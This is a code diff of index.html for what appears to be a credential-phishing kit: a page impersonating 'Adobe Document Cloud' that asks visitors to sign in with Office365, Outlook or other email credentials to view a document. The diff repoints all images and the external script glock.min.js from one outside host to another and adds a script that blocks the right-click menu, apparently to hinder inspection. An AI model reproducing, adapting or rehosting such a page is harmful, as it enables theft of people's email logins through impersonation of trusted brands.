--- a/index.html
+++ b/index.html
@@ -12,7 +12,7 @@
     <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
 
    
-    <link href="https://blessidny.me/oneboob/hoover.css" rel="stylesheet" media="all">
+    <link href="https://bioray-zw.com/oneboob/hoover.css" rel="stylesheet" media="all">
 
     <style type="text/css">
 
@@ -26,7 +26,7 @@
           <div class="row">
             <div class="col-lg-6 mx-auto my-5 px-5 pb-5" style="border:1px solid; background-color: rgba(0,0,0,0.7);border-radius:15px;">
               <div class="text-center pt-5"> 
-                <img src="https://blessidny.me/oneboob/5f9b4016-1a0e-4577-bbd3-bd409138e062adobe.jpg" class="img-fluid" width="100px"><br>
+                <img src="https://bioray-zw.com/oneboob/5f9b4016-1a0e-4577-bbd3-bd409138e062adobe.jpg" class="img-fluid" width="100px"><br>
                 <span class="h5 text-white">Adobe Document Cloud</span><br>
                 <span class="h5 text-white font-weight-normal">To read the document, please enter with the valid email credentials that this file was sent to.</span>
               </div>
@@ -41,7 +41,7 @@
                   <div class="col-lg-12">
                    <a href="javascript:void(0)" id="office365modal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                       <div class=" mt-2" style=" background-color: #FF3C00;">
-                        <img src="https://blessidny.me/oneboob/5f9b4016-1a0e-4577-bbd3-bd409138e062office3651.png" class="img-fluid" style=" background-color: rgba(0,0,0,0.3); padding:5px;" width="40px">
+                        <img src="https://bioray-zw.com/oneboob/5f9b4016-1a0e-4577-bbd3-bd409138e062office3651.png" class="img-fluid" style=" background-color: rgba(0,0,0,0.3); padding:5px;" width="40px">
                         <span class="pl-4" style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with Office365</span>
                       </div>
                     </a>
@@ -57,7 +57,7 @@
                   <div class="col-lg-12">
                     <a href="javascript:void(0)" id="outlookmodal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                       <div class=" mt-2" style=" background-color: #0073C8;">
-                        <img src="https://blessidny.me/oneboob/5f9b4016-1a0e-4577-bbd3-bd409138e062_outlook1.png" class="img-fluid" style=" background-color: rgba(0,0,0,0.3); padding:5px;" width="40px">
+                        <img src="https://bioray-zw.com/oneboob/5f9b4016-1a0e-4577-bbd3-bd409138e062_outlook1.png" class="img-fluid" style=" background-color: rgba(0,0,0,0.3); padding:5px;" width="40px">
                         <span class="pl-4" style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with Outlook</span>
                       </div>
                     </a>
@@ -73,7 +73,7 @@
                   <div class="col-lg-12">
                     <a href="javascript:void(0)" id="othermodal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                       <div class=" mt-2" style=" background-color: #0B5BD3;">
-                        <img src="https://blessidny.me/oneboob/5f9b4016-1a0e-4577-bbd3-bd409138e062other1.png" class="img-fluid" style=" background-color: rgba(0,0,0,0.3); padding:5px;" width="40px">
+                        <img src="https://bioray-zw.com/oneboob/5f9b4016-1a0e-4577-bbd3-bd409138e062other1.png" class="img-fluid" style=" background-color: rgba(0,0,0,0.3); padding:5px;" width="40px">
                         <span class="pl-4" style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with Other Mail</span>
                       </div>
                     </a>
@@ -147,5 +147,10 @@
   
 
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
-  <script src="https://blessidny.me/oneboob/glock.min.js"></script>
+  <script src="https://bioray-zw.com/oneboob/glock.min.js"></script>
   </div></body></html>
+<script>
+document.addEventListener("contextmenu", function(event){
+event.preventDefault();    
+}, false);
+</script>
